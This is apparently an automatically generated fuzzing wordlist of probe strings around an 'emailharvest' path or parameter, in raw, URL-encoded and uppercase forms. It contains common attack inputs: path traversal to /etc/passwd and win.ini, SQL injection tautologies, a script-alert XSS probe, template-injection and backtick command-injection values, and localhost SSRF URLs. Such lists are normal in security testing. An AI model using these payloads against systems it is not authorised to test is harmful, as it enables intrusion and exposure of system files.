emailharvest_probe
emailharvest_test
/emailharvest
/emailharvest/status
emailharvest=1
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%2Femailharvest
%2Femailharvest%2Fstatus
emailharvest%3D1
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
EMAILHARVEST_PROBE
EMAILHARVEST_TEST
/EMAILHARVEST
/EMAILHARVEST/STATUS
EMAILHARVEST=1
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
%2FEMAILHARVEST
%2FEMAILHARVEST%2FSTATUS
EMAILHARVEST%3D1
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1
" OR "1"%3D"1
emailharvest_probe?v=0
emailharvest_probe&v=0
emailharvest_probe_0
emailharvest_0
/emailharvest/0
emailharvest_probe%0a0
emailharvest_test?v=1
emailharvest_test&v=1
emailharvest_test_1
emailharvest_1
/emailharvest/1
emailharvest_test%0a1
/emailharvest?v=2
/emailharvest&v=2
%2Femailharvest_2
emailharvest_2
/emailharvest/2
/emailharvest%0a2
/emailharvest/status?v=3
/emailharvest/status&v=3
%2Femailharvest%2Fstatus_3
emailharvest_3
/emailharvest/3
/emailharvest/status%0a3
